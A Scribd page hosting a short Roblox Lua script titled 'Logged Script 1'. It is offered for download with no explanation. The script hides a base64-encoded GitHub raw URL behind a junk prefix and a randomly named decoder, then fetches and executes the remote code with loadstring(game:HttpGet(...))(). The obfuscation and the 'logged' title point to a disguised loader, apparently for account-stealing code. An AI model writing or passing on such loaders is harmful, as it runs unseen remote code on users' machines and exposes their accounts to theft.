0% found this document useful (0 votes)
17 views1 page

Logged Script 1

Uploaded by

martin457xd
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
17 views1 page

Logged Script 1

Uploaded by

martin457xd
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'

function
BWupGAZJToLSboIjbHphQGSNzQZJcWgmvedUMCcyNaqsOSjUqMXWWvHBmdQOuktfypNbzOOBnuGqdgDPXdk
(data) m=string.sub(data, 0, 55) data=data:gsub(m,'')

data = string.gsub(data, '[^'..b..'=]', '') return (data:gsub('.', function(x) if


(x == '=') then return '' end local r,f='',(b:find(x)-1) for i=6,1,-1 do r=r..(f
%2^i-f%2^(i-1)>0 and '1' or '0') end return r; end):gsub('%d%d%d?%d?%d?%d?%d?%d?',
function(x) if (#x ~= 8) then return '' end local c=0 for i=1,8 do c=c+
(x:sub(i,i)=='1' and 2^(8-i) or 0) end return string.char(c) end)) end

loadstring(game:HttpGet(BWupGAZJToLSboIjbHphQGSNzQZJcWgmvedUMCcyNaqsOSjUqMXWWvHBmdQ
OuktfypNbzOOBnuGqdgDPXdk('FMipnYxzOYJRJDxsyRiKvDMQZXztEomlRBJNWBgSRzaKClrGfhZGLNHaH
R0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL1RvbWF0bzIwMDEvTmdzanNpZGJ3eXUvbWFpbi9ic
3Zoc2hzYndrMQ==')))()

You might also like